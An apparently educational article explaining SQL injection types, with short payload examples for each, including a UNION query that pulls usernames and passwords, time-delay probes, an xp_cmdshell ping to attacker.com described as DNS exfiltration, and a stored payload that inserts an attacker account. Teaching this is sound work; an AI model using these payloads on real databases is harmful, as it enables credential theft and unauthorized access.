SQL Injection (SQLi) is an attack technique that allows an attacker to manipulate the SQL queries that an application makes to its database. There are several different types of SQLi such as:
In-Band SQL Injection
This is the most common and easy-to-exploit form of SQL injection, where the attacker uses the same communication channel for both launching the attack and receiving the results.
- Error-Based SQLi – Leverages detailed error messages from the database to understand the structure and perform further exploitation.
- Union-Based SQLi – Uses the ‘UNION’ SQL operator to combine the results of two or more ‘SELECT’ statements into a single result.
Payload example:' UNION SELECT username, password FROM users --
This payload attempts to retrieve usernames and passwords from the ‘users’ table.
Inferential SQL Injection (Blind SQL Injection)
This does not directly return data from the database. Instead, attackers deduce information based on the application’s responses to their input.
- Boolean-Based Blind SQLi – The attacker sends SQL queries that force the application to return different results depending on whether the query returns true or false.
Payload example:' AND 1=1 -- ' AND 1=2 --
This first payload should return a valid result, while the second should return no result, allowing the attacker to infer the truth. - Time-Based Blind SQLi – The attacker sends queries that cause delays in the database’s responses if certain conditions are true.
Payload Example:'; IF (1=1) WAITFOR DELAY '00:00:05' --
This payload forces the database to wait for 5 seconds if the condition is true.
Out-of-band SQL Injection
This is less common and involves using different communication channels for the attack and the results. This type of injection is typically used when in-band techniques are not effective, and it relies on the database server’s capability to make HTTP or DNS requests.
Payload Example:
'; EXEC xp_cmdshell('ping -n 5 attacker.com') --
This payload attempts to make the database server ping an external server, effectively exfiltrating data via DNS requests.
Second-Order SQL Injection
This one occurs when malicious inputs are not immediately executed, but are stored in the database and later retrieved and executed in a different context. This type of injection is particularly tricky because the initial input seems harmless, but when it is retrieved and used in a new query, it can execute the malicious payload.
Example:
Payload Example:
normaluser'); INSERT INTO users (username, password) VALUES ('attacker', 'pass123'); --
Then it’s retrieved in some other functionality with the payload attached, like retrieving the user:
SELECT * FROM users WHERE username = 'normaluser'); INSERT INTO users (username, password) VALUES ('attacker', 'pass123'); --';
 attacks and explore various types along with examples of attack payloads and their implications.){kind=link}